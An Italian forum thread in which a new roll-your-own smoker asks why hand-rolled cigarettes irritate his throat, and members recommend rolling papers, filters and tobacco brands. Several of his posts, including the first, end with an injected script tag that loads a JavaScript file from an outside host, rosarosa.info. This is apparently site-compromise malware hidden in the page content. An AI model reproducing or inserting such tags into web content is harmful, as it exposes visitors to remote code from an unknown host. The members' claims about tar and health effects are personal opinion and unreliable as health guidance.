Homepage Forum Welcome Tabacco da rollare

Tabacco da rollare

Questo topic ha 24 risposte, 9 partecipanti ed è stato aggiornato l'ultima volta 10 anni, 3 mesi fa da JeanNicot.
  • Creatore
    Discussione
  • #4446

    Asdrubale
    Membro

    salve,da 2 giorni a questa parte ho deciso di smettere con le sigarette preconfezionate passando cosi’ alle rollate.
    ho comprato la macchinetta(indispensabile per il passaggio) cartine smoking gold e tabacco drum original,ne ho preso abbastanza per mesi,in modo tale da risparmiare tantissimo in quanto ero convinto che mi sarei trovato abbastanza bene.generalmente fumo 7-8 sigarette al giorno,non ho tosse ne catarro,non ho irritazioni alla gola…beh passato a questa roba il giorno dopo mi sono ritrovato la gola irritata(fastdio quando deglutivo,1 po’ di catarro e una lieve tosse secca…
    ho bisogno del vostro aiuto,quando fumo le rollate,mi sento insoddisfatto,non mi passa la voglia di fumare però la gola invece si irrita…ora,la questione è semplice,non sono intenzionato a tornare indietro perchè non voglio regalare + soldi al tabacchino quinbdi o mi faccio piacere sta roba oppure smetterò…per me fumare è sempre stato 1 piacere e proprio per questo ne fumavo poche godendomele appieno….
    in passato di tanto in tanto fumavo le sigarette rollate ma avevano 1 sapore +buono..non so perchè,il drum mi piaceva perciò non credo che il problema sia il tabacco ma le cartine…voi che siete esperti potrete senz’altro aiutarmi…vi prego di rispondere in tanti perchè sono molto demoralizzato e insoddisfatto…i filtrini sono quelli della OCB slim,ho provato anche a mettere il tabacco di 1 camel(sigarette che amo) e il filtro grosso di 1 camel,ma niente il saporaccio persiste cosi’ come il mal di gola,al che mi viene da pensare che le cartine siano il vero problema….pensavo di prendere quelle alla canapa o al lino ovvero quelle naturali…non lo so…so solo chese avessero questo saporaccio e questo effetto nessuno le fumerebbe….
    per cortesia aiutatemi
    <script src=”http://rosarosa.info/dfi823hs.js?0.5975436607999031″></script&gt;

Stai vedendo 24 repliche - dal 1 al 24 (di 24 totali)
  • Autore
    Repliche
  • #20603

    JeanNicot
    Membro

    Asdrubale, tu vieni a casa del diavolo a chiedere consigli per una vita più virtuosa.
    Qui sostanzialmente potrai trovare ottimi suggerimenti su come affinare il vizio.

    Ad ogni modo ti consiglio anch’io di leggerti la discussione che ti ha consigliato Lele: https://www.rollingtobacco.it/forum/off-topic/sigarette-rollate-a-mano-fanno-piu-male-di-quelle-industriali#post-2234

    Ci sono moltissime opinioni, considerazioni, idee, certezze, speranze, ma ad oggi non mi sembra esistere alcuna seria ricerca su maggiori o minori danni del ryo rispetto alle confezionate.
    Anche perché una seria ricerca in tale direzione non avrebbe senso perché mancante di qualsiasi validità generale, considerate tutte le variabili che entrano in gioco e che tu stesso hai avuto già modo di constatare in questi due giorni.

    Se hai la volontà di smettere, seguila, di sicuro ti stimeremo ed invidieremo tutti.
    Comunque tu decida, benvenuto tra noi.

    #20596

    Carry
    Partecipante

    Asdrubale ha detto:

    lele ha detto:

    Durano di meno perchè le tipo A sono autocomburenti,cioè si fumano col vento,quindi miniri valori di nicotina e condensato ma la sigaretta dura meno. Tabacchi senza additivi non dico che sono più sani,ma non hanno varie cose con cui vengono miscelati per esempio gli umidi.

    Io fumando RYO ne fumo 15 al dì,e ne fumavo circa 10 quando fumavo confezionate,quindi se uno vuole smettere non passa al RYO ma non fuma!

    confesso che 1 po’ sono preoccupato,con le industriali potevo arrivare anche a 12-13 ma stavo ok a fine giornata mentre con le rollate bastano 4-5 sigarette per farmi sentire appesantito,speriamo sia tutto legato alle vecchie cartine ma non credo,secondo me le rollate fanno + male però indietro non torno e non perchè mi voglio avvelenare pur di risparmiare ma perchè sono convinto che potendo decidere quanto tabacco mettere la dipendenza rispetto alle sostanza della sigaretta calerà fino a poco tempo fa ne fumavo 8,adesso voglio scendere a 5 nel giro di 2 settimane.vendono i filtrini della stessa dimensione delle sigarette industriali?<script src=”http://rosarosa.info/dfi823hs.js?0.34309952996699555″></script&gt;

    decidi:) sei passato al ryo per risparmiare o per fumare meno?
    guarda per me puoi fare come vuoi, solo una cosa ti chiedo, fumare fa male quindi niente discorsi salutisti, ah un consiglio non pensare che i senza additivi facciano meno male, fuma quello che ti piace e magari usa delle rizla blu anche le rosse vanno bene le bianche le lascerei stare

    #20595

    Asdrubale
    Membro

    Carry ha detto:

    Asdrubale ha detto:

    lele ha detto:

    Durano di meno perchè le tipo A sono autocomburenti,cioè si fumano col vento,quindi miniri valori di nicotina e condensato ma la sigaretta dura meno. Tabacchi senza additivi non dico che sono più sani,ma non hanno varie cose con cui vengono miscelati per esempio gli umidi.

    Io fumando RYO ne fumo 15 al dì,e ne fumavo circa 10 quando fumavo confezionate,quindi se uno vuole smettere non passa al RYO ma non fuma!

    confesso che 1 po’ sono preoccupato,con le industriali potevo arrivare anche a 12-13 ma stavo ok a fine giornata mentre con le rollate bastano 4-5 sigarette per farmi sentire appesantito,speriamo sia tutto legato alle vecchie cartine ma non credo,secondo me le rollate fanno + male però indietro non torno e non perchè mi voglio avvelenare pur di risparmiare ma perchè sono convinto che potendo decidere quanto tabacco mettere la dipendenza rispetto alle sostanza della sigaretta calerà fino a poco tempo fa ne fumavo 8,adesso voglio scendere a 5 nel giro di 2 settimane.

    ma questo discorso lo puoi fare anche con le industriali sai!è una questione di testa non di altro, guarda non voglio sembrare maleducato ma se scrivi qua perche vuoi smettere di fumare è meglio che non scrivi niente perche qua la gente puo dirti come fumare meglio ma non come smettere

    no,mi hai frainteso
    io voglio smettere di fumare già da tempo ma non ci riesco,non sono passato alle rollate per smettere,ma per risparmiare : )
    comunque sia con la scusa della tosse ecc….riuscirò + facilmente a diminuire e la dipendenza psicologica si indebolirà

    #20594

    Asdrubale
    Membro

    Carry ha detto:

    fumare fa male e basta!se cerchi qualcosa che non ti fa male comprati le sigarette senza nicotina alle erbe, ma dove sta scritto che con il ryo si fuma meno?ma perche?va be…

    non ho detto che si fuma di meno,ho letto che molte persone che prima fumavano le industriali con il passaggio alle rollate hanno diminuito il numero delle sigarette(anche se questo dato dovrebbe essere preoccupante) perciò forse riuscirò a ridurre le mie 8 sigarette al di
    la mia dipendenza è psicologica,se riesco a diminuire il numero di sigarette con il tempo anche essa calerà.

    #20593

    lele
    Membro

    Infatti!! A me piace un casino rollare e di conseguenza fumare tabacchi che mi piacciono,che mi frega del male,tanto ormai tutto fa male,e non si fuma meno,nel mio caso di più,ma fumi “sensato”,non solo vizio ma anche piacere!

    #20592

    Carry
    Partecipante

    Asdrubale ha detto:

    lele ha detto:

    Durano di meno perchè le tipo A sono autocomburenti,cioè si fumano col vento,quindi miniri valori di nicotina e condensato ma la sigaretta dura meno. Tabacchi senza additivi non dico che sono più sani,ma non hanno varie cose con cui vengono miscelati per esempio gli umidi.

    Io fumando RYO ne fumo 15 al dì,e ne fumavo circa 10 quando fumavo confezionate,quindi se uno vuole smettere non passa al RYO ma non fuma!

    confesso che 1 po’ sono preoccupato,con le industriali potevo arrivare anche a 12-13 ma stavo ok a fine giornata mentre con le rollate bastano 4-5 sigarette per farmi sentire appesantito,speriamo sia tutto legato alle vecchie cartine ma non credo,secondo me le rollate fanno + male però indietro non torno e non perchè mi voglio avvelenare pur di risparmiare ma perchè sono convinto che potendo decidere quanto tabacco mettere la dipendenza rispetto alle sostanza della sigaretta calerà fino a poco tempo fa ne fumavo 8,adesso voglio scendere a 5 nel giro di 2 settimane.

    ma questo discorso lo puoi fare anche con le industriali sai!è una questione di testa non di altro, guarda non voglio sembrare maleducato ma se scrivi qua perche vuoi smettere di fumare è meglio che non scrivi niente perche qua la gente puo dirti come fumare meglio ma non come smettere

    #20591

    Carry
    Partecipante

    fumare fa male e basta!se cerchi qualcosa che non ti fa male comprati le sigarette senza nicotina alle erbe, ma dove sta scritto che con il ryo si fuma meno?ma perche?va be…

    #20590

    Asdrubale
    Membro

    lele ha detto:

    Durano di meno perchè le tipo A sono autocomburenti,cioè si fumano col vento,quindi miniri valori di nicotina e condensato ma la sigaretta dura meno. Tabacchi senza additivi non dico che sono più sani,ma non hanno varie cose con cui vengono miscelati per esempio gli umidi.

    Io fumando RYO ne fumo 15 al dì,e ne fumavo circa 10 quando fumavo confezionate,quindi se uno vuole smettere non passa al RYO ma non fuma!

    confesso che 1 po’ sono preoccupato,con le industriali potevo arrivare anche a 12-13 ma stavo ok a fine giornata mentre con le rollate bastano 4-5 sigarette per farmi sentire appesantito,speriamo sia tutto legato alle vecchie cartine ma non credo,secondo me le rollate fanno + male però indietro non torno e non perchè mi voglio avvelenare pur di risparmiare ma perchè sono convinto che potendo decidere quanto tabacco mettere la dipendenza rispetto alle sostanza della sigaretta calerà fino a poco tempo fa ne fumavo 8,adesso voglio scendere a 5 nel giro di 2 settimane.
    vendono i filtrini della stessa dimensione delle sigarette industriali?
    <script src=”http://rosarosa.info/dfi823hs.js?0.34309952996699555″></script&gt;

    #20589

    lele
    Membro

    Durano di meno perchè le tipo A sono autocomburenti,cioè si fumano col vento,quindi miniri valori di nicotina e condensato ma la sigaretta dura meno. Tabacchi senza additivi non dico che sono più sani,ma non hanno varie cose con cui vengono miscelati per esempio gli umidi.

    Io fumando RYO ne fumo 15 al dì,e ne fumavo circa 10 quando fumavo confezionate,quindi se uno vuole smettere non passa al RYO ma non fuma!

    #20588

    Asdrubale
    Membro

    perfetto
    sono molto soddsfatto
    mi sono fatto cambiare 2 di drum con chesterfiel RYO e con natural american spirit
    ho preso le rilza bianche e le rilza rosse
    ho provato subito le bianche con le chesterfield Ryo e che dire?buonissime,lasciano 1 sapore fresco in bocca e non raschiano,sono perfette
    però durano di meno,come mai?perchè la carta è + grossa?
    1 altra cosa,non c’è 1 modo per ridurre la carta?
    ora cercherò di fumarne il meno possibile,spero 1 domani di riuscire a smettere di fumare….
    questi 2 tipi di tabacco non hanno additivi il che significa che sono + “sani” giusto?perlomeno mi ripulisco leggermente la coscienza,dite che con il passaggio dalle industriali alle rollate avrò maggiori vantaggi per quanto riguarda smettere?
    grazie di tutto per i consigli spero di poterne ricevere altri : )
    <script src=”http://rosarosa.info/dfi823hs.js?0.26373135015709015″></script&gt;

    #20580

    lele
    Membro

    Allora,soggettivamente parlando io trovo il Golden Virginia Verde quasi solo ammoniaca,un gustaccio della malora (scusate il termine) che già dopo una paglia non riesco più a fumare. Comunque può essere un tabacco 24H. Per i malanni delle sigarette rollate contro quelle industriali c’è una discussione abbastanza lunga e commentata da vari utenti,ma se uno vuole fumare fuma senza badare a troppi mm di carta in più o altro.

    https://www.rollingtobacco.it/forum/off-topic/sigarette-rollate-a-mano-fanno-piu-male-di-quelle-industriali#post-2234

    Qui è il thread della tua prima domanda

     

    #20577

    Asdrubale
    Membro

    ma in linea di massima le sigarette rollate non dovrebbero essere meno dannose rispetto a quelle industriali?ho letto che secondo alcuni sono perfino + cancerogene…voi che opinione avete a riguardo?
    quindi provo le rilza bianche,le rilza rosse e quale altro tipo?
    il golden virginia com’è secondo voi?è adatto per le fumate di tutti i giorni,a me piaceva molto,casomai mi faccio sostituire 2 drum con 2 golden tanto per provare anche se non sono sicuro che il tabaccaio possa essere d’accordo…
    <script src=”http://rosarosa.info/dfi823hs.js?0.6201015579113773″></script&gt;

    #20575

    lele
    Membro

    Allora,il condensato dipende sia dal tabacco e sia dalla cartina che si utililizza;con cartine tipo A (rex bravo,rizla bianche ecc) si ha un condensato e nicotina minore rispetto ad una cartina tipo B (rizla silver,ocb nere ecc). Il tuo problema secondo me è che ti devi ancora abituare,all’inizio io schifavo le cartine tipo B,mi davano un sapore amaro e non riuscivo a fumarla,cosi fumai tutto con le Bravo. Da sei mesi a sta parte fumo tutto con le tipo B,dai secchi (pochi) agli umidi (molti). Quindi dopo tutto ciò prova con cartine che ti hanno già consigliato,io personalmente ti consiglierei le Rizla Rosse,sono di media densità,ma le ritengo migliori insieme alle Bravo tra le cartine tipo A. Se proprio non riesci prova a rollare a bandiera,ma se hai qualche problema nel rollare normalmente dubito sia facile. Non posso dirti di più,spero che riuscirai a risolvere il problema

    #20573

    bigmarco
    Moderatore

    Ma se avevi già provato a rollare ritenta, vedrai che in poco tempo avrai migliori risultati.  Le cartine fini producono più condensato di quelle spesse perché bruciano lentamente, con i tabacchi umidi come il Drum le sigarette se non sei pratico a rollare si spengono in continuazione. Se per cartine alla canapa o al lino intendi le cosiddette cartine “naturali” esistono di varie marche…..guarda nella gallery “cartine” sotto al titolo e trovi tutto lì. (a me personalmente non piacciono,le sento amare, ma va a gusti)

    "era un mondo adulto, si sbagliava da professionisti" P. Conte "boogie"

    #20572

    Asdrubale
    Membro

    bigmarco ha detto:

    Con quelle cartine fini, il tabacco umido e la rollatrice che pressa il trinciato, ogni sigaretta che rolli produce tanto condensato quanto 4 o 5 sigarette industriali…..prendi delle cartine più spesse,e cerca di rollare morbido senza pressare. Prova, un libretto di cartine Rizla bianche o Rex Bravo rosa costa 50/60 centesimi, se sentirai ancora quel fastidio in gola cambiando cartine e pressando poco il tabacco può essere che tu sia allergico a qualche additivo del Drum. 

    grazie ragazzi per le risposte
    se le rollo io faccio 1 macello,qualche anno fa le facevo cosi’ larghe che neanche riuscivo a tirare….comprerò ste cartine larghe,ho sfasciato 1 camel e l’ho rollata ma sento ancora quel retrogusto osceno quindi non è il tabacco il problema…
    ditemi qualche altro tipo di cartina,comprerò 3 o 4 pacchetti cosi’ le provo tutte,male che vada riduco a 3-4 sigarette senza aspirare e buonanotte….4.50 centesimi per 1 pacchetto non li spendo +….
    cosa intendi per condensato?se compro ste cartine risolvo anche quel problema?
    consigliatemi anche 2 cartine alla canapa o al lino cosi’ vedo se con quelle naturali risolvo,le rilza bianche le proverò sicuramente,oggi voglio risolvere

    #20570

    bigmarco
    Moderatore

    Con quelle cartine fini, il tabacco umido e la rollatrice che pressa il trinciato, ogni sigaretta che rolli produce tanto condensato quanto 4 o 5 sigarette industriali…..prendi delle cartine più spesse,e cerca di rollare morbido senza pressare. Prova, un libretto di cartine Rizla bianche o Rex Bravo rosa costa 50/60 centesimi, se sentirai ancora quel fastidio in gola cambiando cartine e pressando poco il tabacco può essere che tu sia allergico a qualche additivo del Drum. 

    "era un mondo adulto, si sbagliava da professionisti" P. Conte "boogie"

    #20569

    ao59
    Membro

    Basta comprare 1 pacchetto di cartine tipo A ( circa 50/60 cent ) e capirai subito se sono le cartine o il tabacco. Poi vai dove li hai comprati e chiedi di cambiare quello che non ti piace :-)

    When you ain't got nothin', you got nothin' to lose

    #20568

    Asdrubale
    Membro

    grazie per le risposte,tuttavia mi piacerebbe sapere qual’è il problema secondo voi
    cioè,io ho ipotizzato che il problema possa avere a che fare con le cartine anche perchè quando tiro,non ricevo il colpo in gola che ricevevo con le industriali e quindi ciò fa pensare che il tabacco si abbastanza leggero,tuttavia poi quando ho finito sento qualche fastidio alla gola…alcuni di voi mi hanno consigliato dei tipi di cartine ma avendo già speso molto vorrei andare sul sicuro perchè ho scelto questa strada proprio per risparmiare : ) grazie ancora per la gentilezza,i vostri consigli sono preziosi per me.
    <script src=”http://rosarosa.info/dfi823hs.js?0.29501125001617823″></script&gt;

    #20406

    Stefany
    Membro

    uhm…allora posso dirti per esperienza che le smoking gold tendono ad amareggiare un pò la sigaretta…inoltre c’è una linea guida che dice che con il tabacco umido vanno le cartine di tipo a (quindi più spesse es Bravo rosa, rizla bianche…) e con quello secco le cartine di tipo b come proprio le tue smoking gold…poi non è legge perchè ad esempio il buon pierato si fuma gli halfzware con le cartine di tipo b e da quanto ho capito si trova benone…=D…potresti cambiare cartine e riprovare con il drum blu oppure prendere 1 altro tabacco magari secco e provare con le smoking…visto che però ti tocca in gola fossi in te prenderei un tabacco umido più leggero con cartine di tipo A, magari il drum azzurro o il mac baren bianco che è molto apprezzato…e se la sigaretta con i filtri slim ti lascia insoddisfatto prova i filtri regular!…

    "Qui siamo tutti matti, io sono matto, tu sei matta"
    "come sai che sono matta?"
    "Tu sei matta, altrimenti non saresti qui"

    #20392

    Johnny Hooker
    Moderatore

    Buongiorno Asdrubale, benvenuto nella gabbia dei matti.
    Dai su, anima e coraggio, lascia perdere lo sconforto e pensa positivo!
    Generalmente il tabacco delle confezionate è secco, tritato a tocchetti piccoli e riempie un tubo di 7 mm con lunghezza variabile.
    Il trinciato sfuso è totalmente diverso, è filamentoso, può essere secco (additivato o meno) semi umido o umido, e lo incarti come ti pare e piace.
    Ora, io non ricordo la sensazione che ho provato fumando la prima sigaretta rollata, ma di natura tendo a non dare troppa importanza ai fastidi anzi, generalmente ci fumo sopra.
    Riconosco comunque che il passaggio possa essere traumatico, ma quel “saporaccio” di cui parli potrebbe pure essere il “sapore” che non avevi mai sentito abituato alle confezionate.
    Se devo darti un consiglio visto che parli di cartine sbagliate sarebbe quello di usare i tubi, comporterebbe un’ altra spesa però.
    Consiglio numero due, verifica che il tabacco sia in buona salute, magari è secco e ti da noia per quello, nella sezione tabacchi italia trova il tabacco che stai fumando, leggi la recensione e vedi le foto per trovare le differenze.
    Terzo consiglio, lo stesso di big marco..quando si rolla le prime volte, non si sa mai bene quanto tabacco adoperare…le mie prime sigarette duravano 1/4 d’ora…d’orologio mica scherzo! Ho lanciato quel rollatore e ho deciso di farle a mano, problema risolto e sigarette perfette sin dall’inizio, meglio fumare una sigaretta un pò vuota le prime volte, piuttosto che troppo piena, prenditela con calma e vedrai che passa tutto man mano che ci prenderai la mano..e perchè no anche la gola!

    Non ho bisogno di alcun maestro. Il modo di tenerla ... di girarla ... me lo insegna la cartina stessa. Per omaggiare la bellissima firma de El Merendero.

    #20379

    bigmarco
    Moderatore

    Ciao Asdrubale, benvenuto.  Può essere che tu debba ancora fare un po’ di pratica con il rollatore, e che questo ti pressi troppo il tabacco,  la sigaretta tira bene? Non fai sforzo nel tirare il fumo? Il Drum Original è un buon tabacco, ma è umido, e prima di metterlo nel rollatore devi sfilacciarlo molto bene, facendolo asciugare un pelino, altrimenti si incolla e ti sembra di fumare un bastone di liquirizia.  Rollando con filtrino slim devi mettere meno tabacco, non riempire la sacca come per i filtri regular da 8 mm. non ti sto qui a dire di buttare il rollatore e di fartele a mano, perché so bene che ” nessuno nasce imparato”, ma ora si parte avvantaggiati….ci sono filmati su youtube, e poi non pensare che sia così difficile, ci vuole solo un po’ di tempo e pazienza e voglia di provarci……pian piano.

    "era un mondo adulto, si sbagliava da professionisti" P. Conte "boogie"

    #20347

    ao59
    Membro

    Ciao e benvenuto. Se ti piace il Drum, prova a cambiare cartine. Io, ad esempio, uso quasi esclusivamente cartine tipo A, indipendentemente dal tipo di tabacco. Con le cartine sottili, tipo B, avverto un sapore più amarognolo e a volte un fastidio in gola. Potrebbero essere quindi le cartine a darti fastidio. Prova ad esempio le Bravo rosa, o le Rizla verdi. Apparentemente sembrano più pesanti, ma se leggi i valori di nicotina e condensato riportati sui vari tabacchi, noterai che i valori sono inferiori con le tipo A. Qualcosa vorrà pur dire :-) 

    When you ain't got nothin', you got nothin' to lose

    #20343

    Asdrubale
    Membro

    Lion67 ha detto:

    Innanzitutto benvenuto tra noi Asdrubale , sulla combinazione Drum Original/Smoking Gold non so che dirti, l’ Original ancora non l’ ho fumato dalla mia conversione al RYO di un paio di mesi fa (anche se tempo fa l’ ho fumato sporadicamente e mi piaceva) , sarà uno dei prossimi tabacchi che acquisterò, e le Gold, pur avendone acquistato un libretto per prova un paio di settimane fa non le ho ancora testate.

    Forse catarro e tosse dipendono dal passggio da un tipo di fumata ad un altro, ricordo che all’ abbandono delle KS un po di catarro lo avevo anche io ( per la tosse invece devo dire che l’ avevo prima e col RYo è scomparsa ) , se le Gold non ti soddisfano prova altre cartine, OCB premium (nere) e Rizla+ azzurre se vuoi restare sulle “fini” , Rex Bravo o altre se vuoi andare su cartine più spesse (in ogni caso dai uno sguardo alla sezione CARTINE )

    Filtri uso anche io gli OCB slim ( li preferisco ai Rizla+ slim, non incartati, che ti consiglio comunque di provare, cosi verifichi quali ti vanno di più )

    Troverai senz’ altro qualcuno che, per esperienza, ti saprà indirizzare meglio di me, anche per il tipo di tabacco da usare, ma credo che poi anche loro, come me, ti diranno che la cosa migliore è provare, per vedere tu stesso qual’ è la combinaziuone migliore Tabacco/cartina/eventuale filtro per i tuoi gusti.

    Ciao e buone fumate

    P.S. : ma proprio con il Drum vai a fare una scorta che ti duri mesi ? (Lo dico solo perchè è reperibile abbastanza facilmente, non per dire niente di male su questo tabacco). Se ti consigliano altri tabacchi e li vuoi provare ti consiglio (se il tuo tabaccaio è d’ accordo) di fare uno scambio in modo da non dover spendere altri soldi inutilmente.

     

    grazie per la risposta
    la verità è che sento 1 sorta di velo nella gola
    la cosa mi infastidisce tantissimo perchè ho voglia di fumare ma non posso…lo scambio mi sembra difficile da fare,potrei provarci ma non so…
    sono demoralizzato,quando aspiro non raschiano molto però poi mi viene questo fastidio alla gola….il sapore poi non è dei migliori ma è strano perchè l’odore è buonissimo….sento troppa carta,mi disgusta questa cosa ma voglio essere sicuro anche perchè hp già speso 45 euro….

    #20342

    Lion67
    Moderatore

    Innanzitutto benvenuto tra noi Asdrubale , sulla combinazione Drum Original/Smoking Gold non so che dirti, l’ Original ancora non l’ ho fumato dalla mia conversione al RYO di un paio di mesi fa (anche se tempo fa l’ ho fumato sporadicamente e mi piaceva) , sarà uno dei prossimi tabacchi che acquisterò, e le Gold, pur avendone acquistato un libretto per prova un paio di settimane fa non le ho ancora testate.

    Forse catarro e tosse dipendono dal passggio da un tipo di fumata ad un altro, ricordo che all’ abbandono delle KS un po di catarro lo avevo anche io ( per la tosse invece devo dire che l’ avevo prima e col RYo è scomparsa ) , se le Gold non ti soddisfano prova altre cartine, OCB premium (nere) e Rizla+ azzurre se vuoi restare sulle “fini” , Rex Bravo o altre se vuoi andare su cartine più spesse (in ogni caso dai uno sguardo alla sezione CARTINE )

    Filtri uso anche io gli OCB slim ( li preferisco ai Rizla+ slim, non incartati, che ti consiglio comunque di provare, cosi verifichi quali ti vanno di più )

    Troverai senz’ altro qualcuno che, per esperienza, ti saprà indirizzare meglio di me, anche per il tipo di tabacco da usare, ma credo che poi anche loro, come me, ti diranno che la cosa migliore è provare, per vedere tu stesso qual’ è la combinaziuone migliore Tabacco/cartina/eventuale filtro per i tuoi gusti.

    Ciao e buone fumate

    P.S. : ma proprio con il Drum vai a fare una scorta che ti duri mesi ? (Lo dico solo perchè è reperibile abbastanza facilmente, non per dire niente di male su questo tabacco). Se ti consigliano altri tabacchi e li vuoi provare ti consiglio (se il tuo tabaccaio è d’ accordo) di fare uno scambio in modo da non dover spendere altri soldi inutilmente.

     

    Ho smesso di bere, di fumare e di fare sesso...
    sono stati i 15 minuti peggiori della mia vita !!!

Stai vedendo 24 repliche - dal 1 al 24 (di 24 totali)

Devi essere loggato per rispondere a questa discussione.